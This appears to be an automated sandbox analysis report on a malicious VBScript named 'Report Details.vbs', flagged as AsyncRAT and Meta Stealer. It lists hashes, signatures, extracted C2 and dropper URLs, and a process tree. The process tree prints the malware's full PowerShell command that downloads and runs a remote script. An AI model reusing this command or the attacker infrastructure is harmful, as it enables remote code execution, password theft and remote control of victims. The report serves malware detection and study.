Overview

overview

10

Static

static

Report Details.vbs

windows7_x64

10

Report Details.vbs

windows10-2004_x64

10

Resubmissions

15-04-2022 01:59

220415-cefc7sbff3 10

14-04-2022 17:03

220414-vknwmsdchl 10

Analysis

  • max time kernel
    79s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220331-en
  • submitted
    14-04-2022 17:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Report Details.vbs

  • Size

    57KB

  • MD5

    52d94e55aac61768976f39040c288eef

  • SHA1

    e942fa64351f106b614b28e86d3a42d50e5a0443

  • SHA256

    fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747

  • SHA512

    fe278c9483992b979e356ec4380182d7519d47144cf3ed9c9caaf0346c4bcb788272562f57264ac7a3a35bf67e9e36ac19ec5d5a07d9564a99360de77b72b717

Score
10/10
asyncratmetastealerdefaultratstealersuricata

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://textbin.net/raw/x6lfwhnyrz

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

crazydns.linkpc.net:5900

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Meta Stealer Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

    stealermetastealer
  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

    suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

    suricata
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/x6lfwhnyrz'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\x6lfwhnyrz.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1
        3⤵
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3372
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4660
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES790D.tmp" "c:\Users\Admin\AppData\Local\Temp\fuiqaogg\CSCCF543FBEF7C40D8B3AA52C04D3E18.TMP"
            5⤵
              PID:1420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2032

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      85df31411080f87203ed45b0dab4f336

      SHA1

      5bf5b44ce38fa21c305c1a375da9e6ad84f48892

      SHA256

      e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5

      SHA512

      963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      143a478fb47996f74bbbcdaa252b9e0b

      SHA1

      288893a45c1c50f8245a32aa06dfb1ac2ff31c83

      SHA256

      6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

      SHA512

      e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RES790D.tmp
      Filesize

      1KB

      MD5

      eee1b185b88898782ba2146fb08b2aab

      SHA1

      d5ed11e53788bb2dbdde365850c521411ef93796

      SHA256

      840739d3dad95fcdf2fd56cef243661514ed53e9478113c7b10ec4c95c53913a

      SHA512

      fcc7fad2d44326bbad2234ea15f64e947a084f168c1499727be5adc47c9e1a8b5a523a59c181a98b2e585d731f324b70e908ac03ca1c39a37cc27419a13287de

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.dll
      Filesize

      11KB

      MD5

      9463e864f2bb73ddada3fc51b5b6f95a

      SHA1

      0f90fc695df44d8893dcdb38aa6ebdb8235fbdc5

      SHA256

      f65211b8a3514a760a67d6e9451ae5c2bd5dc773b0d0fbf7bac8bb4f6bbec3a6

      SHA512

      d6838ce1cc6cc2b70f01ab332d6b2a723ee8384628f0736b93af8326b46d08e676fa3bf59049238098af44eb1d9836dca55d6df1e191b84c92f0cd08fc0ef522

      Download Submit

    • C:\Users\Public\x6lfwhnyrz.PS1
      Filesize

      119KB

      MD5

      8a4c64e0dc47055ac4df009b38c5c442

      SHA1

      1cfade9c2531a2721261df5f323b918a96fe6db7

      SHA256

      8d6d23ec88918ca2a42e1f578fa0d353bc6c93a557c9cf77a0704964fd9c9f8e

      SHA512

      18911c1ee6c579b5a4ceb79b0b7fe77f4e2af500a0851cbca9c67f2f852517ff25f352820c30dcde0081a99752765ae5d6d77d68f0d80056ac194fff4ee565f9

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\CSCCF543FBEF7C40D8B3AA52C04D3E18.TMP
      Filesize

      652B

      MD5

      be3549f0edb18bb4dffbfa25756ba70a

      SHA1

      f506c7496c880fc2242043431caa1dfe8b4fe937

      SHA256

      2e04831e713969e4f90a2b6bf5bf9850c480ba6fc6ec34e577fd3ff4ebbcc220

      SHA512

      8c4d51ef1ea75e032a79d787d8a2c57e0fdea14bc74898c3e318f2ab91440fe32cfeb9f1010fed44b973212466a10da3504942eebc67595d94c42a66453cb269

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.0.cs
      Filesize

      14KB

      MD5

      5b28648a4e188b0ebdf2d5edcda61624

      SHA1

      faf0ba6c2ef8d8184881eda8a276796449969e1c

      SHA256

      e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1

      SHA512

      972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.cmdline
      Filesize

      327B

      MD5

      81ba1cd33df5baf939bf1dbc521177c8

      SHA1

      aca79a694f74cf64061faeefa144e1f4e5927277

      SHA256

      e645c5a71bb5cc2af1cae874a10830865165564be070b5bbe9be343ed3e136b6

      SHA512

      4095ad6b0e1fe4434f3a61f0d480c8a4491bbe2707dec4d708e6cdd670c06d68cc33eebfaf6691ca8e40ce3a33779fbb64c127813c6841d7c4248e565941627a

      Download Submit

    • memory/2032-145-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

      Download

    • memory/2032-151-0x0000000005C00000-0x0000000005C66000-memory.dmp

      Filesize

      408KB

      Download

    • memory/2032-150-0x0000000006140000-0x00000000066E4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2032-149-0x0000000005AF0000-0x0000000005B8C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3372-134-0x00007FFCC8120000-0x00007FFCC8BE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3372-137-0x000001C7AE316000-0x000001C7AE318000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3372-136-0x000001C7AE313000-0x000001C7AE315000-memory.dmp

      Filesize

      8KB

      Download

    • memory/3372-133-0x000001C7AFF40000-0x000001C7B0468000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/3372-132-0x000001C7AF990000-0x000001C7AFA06000-memory.dmp

      Filesize

      472KB

      Download

    • memory/3372-135-0x000001C7AE310000-0x000001C7AE312000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4292-129-0x000001D3414C6000-0x000001D3414C8000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4292-126-0x00007FFCC8120000-0x00007FFCC8BE1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4292-125-0x000001D35A7F0000-0x000001D35A812000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4292-127-0x000001D3414C0000-0x000001D3414C2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4292-128-0x000001D3414C3000-0x000001D3414C5000-memory.dmp

      Filesize

      8KB

      Download